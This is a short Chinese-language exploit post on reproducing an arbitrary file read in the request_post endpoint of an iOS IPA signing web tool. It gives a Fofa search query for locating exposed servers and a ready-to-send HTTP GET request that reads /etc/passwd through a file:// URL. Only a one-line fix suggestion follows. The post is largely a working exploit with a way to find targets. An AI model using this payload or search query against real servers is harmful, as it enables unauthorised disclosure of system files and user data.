IOS-IPA签名工具 request_post 任意文件读取复现

时间:2024-09-30 19:52:55

0x01 产品描述:

        苹果手机中的IPA是指iOS应用程序(iPhone应用程序)的安装包文件,其文件扩展名为.ipa。IPA文件是经过编译的、已签名的应用程序文件,可以在iOS设备上安装和运行。通常,开发者通过Xcode等开发工具来创建并编译应用程序,然后将生成的IPA文件分发给用户,用户可以通过iTunes或其他安装工具将IPA文件安装到自己的iPhone或iPad上。使用IPA文件可以安装和更新应用程序,而无需通过App Store进行下载和安装。需要注意的是,为了安全起见,iOS设备只能安装经过苹果官方认证的、由苹果App Store审核的应用程序,未授权的IPA文件可能无法安装或打开

0x02 漏洞描述:

        在ios-IPA工具request_post接口中存在任意文件读取漏洞。该漏洞的存在使得攻击者可以通过精心构造的请求,直接访问服务器上的任意文件,甚至可能泄露关键的系统配置文件或用户数据。这类漏洞不仅会导致商家敏感信息的泄露,还可能给用户带来财产损失和隐私侵犯的风险

0x03 搜索语句:

Fofa:body="/assets/index/css/mobileSelect.css"

0x04 漏洞复现:

GET /api/index/request_post?url=file:///etc/passwd&post_data=test HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

 

0x05 修复建议:

系统需对所有用户输入的数据进行严格的验证和过滤,确保输入的文件路径合法,避免攻击者通过构造恶意路径来读取系统文件